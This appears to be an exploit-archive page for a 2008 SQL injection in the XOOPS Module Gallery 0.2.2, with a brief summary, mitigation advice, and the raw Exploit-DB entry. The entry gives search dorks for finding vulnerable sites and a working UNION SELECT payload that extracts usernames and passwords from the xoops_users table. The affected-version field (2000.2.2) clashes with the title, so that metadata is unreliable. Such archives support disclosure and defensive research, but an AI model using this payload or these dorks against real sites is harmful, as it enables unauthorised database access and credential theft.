header-logo
Suggest Exploit
vendor:
Module Gallery
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Module Gallery
Affected Version From: 2000.2.2
Affected Version To: 2000.2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XOOPS Module Gallery 0.2.2 SQL Injection Exploit

XOOPS Module Gallery 0.2.2 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable application. The request contains a malicious SQL statement that is executed by the backend database.

Mitigation:

The best way to mitigate SQL injection attacks is to use parameterized queries. This ensures that user input is treated as a literal value instead of executable code.
Source

Exploit-DB raw data:

##########################################
#
# XOOPS Module Gallery 0.2.2 SQL Injection Exploit
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"modules/gallery"
#
# DORK 2 : allinurl :"modules/gallery"gid
#
###########################################
EXPLOIT :

modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*

###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-12]